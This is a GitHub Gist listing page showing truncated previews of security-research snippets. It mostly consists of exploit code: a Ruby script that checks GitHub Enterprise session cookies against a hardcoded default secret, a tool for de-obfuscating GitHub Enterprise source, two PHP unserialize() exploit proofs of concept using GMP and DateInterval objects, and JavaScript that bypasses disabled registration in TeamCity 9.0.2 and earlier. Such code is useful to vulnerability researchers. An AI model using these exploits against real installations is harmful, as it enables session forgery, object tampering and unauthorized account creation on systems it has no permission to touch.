Skip to content

Instantly share code, notes, and snippets.

@allyshka
allyshka / gitentcookiedecrypt.rb
Last active Mar 9, 2019
GitHub Enterprise cookie decryption with default secret key
View gitentcookiedecrypt.rb
require "cgi"
require "openssl"
cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
cookie = cookie.split("--")
data = CGI.unescape(cookie.first)
loaddata = data.unpack('m').first
hmac = cookie.last
secret = "641dd6454584ddabfed6342cc66281fb"
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"
View enterprisedecrypt.rb
#!/usr/bin/ruby
#
# This tool is only used to "decrypt" the github enterprise source code.
#
# Run in the /data directory of the instance.
require "zlib"
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+
"from making modifications to the VM. We know this 'encryption' is easily broken. "
@allyshka
allyshka / test.php
Created Feb 11, 2017
PHP <= 5.6.11 DateInterval + GMP unserialize() object change exploit
View test.php
<?php
$a = new stdClass; // handle = 1
$a->test = false;
echo('Property $a->test is: ');
var_dump($a->test);
$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
echo('Property $a->test changed to: ');
var_dump($a->test);
@allyshka
allyshka / test.php
Created Feb 10, 2017
PHP < 5.6.30 GMP unserialize() test exploit.
View test.php
<?php
class obj
{
var $test;
function __wakeup()
{
$this->test = 1;
}
}
View host.sh
#!/bin/bash
display_usage() {
echo "This script check connection to list of URLs with specified host."
echo -e "\nUsage:\n$0 ipsfile hostname\n"
echo -e "\nExample:\n$0 moz-com.list moz.com\n"
}
if [ $# -le 1 ]
then
@allyshka
allyshka / teamcitylte902reg.js
Last active Mar 9, 2019
TeamCity <= 9.0.2 disabled registration bypass
View teamcitylte902reg.js
var login = 'testuser'; //логин пользователя
var password = 'SuperMEgaPa$$'; //пароль
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
onDuplicateAccountError: function(b) {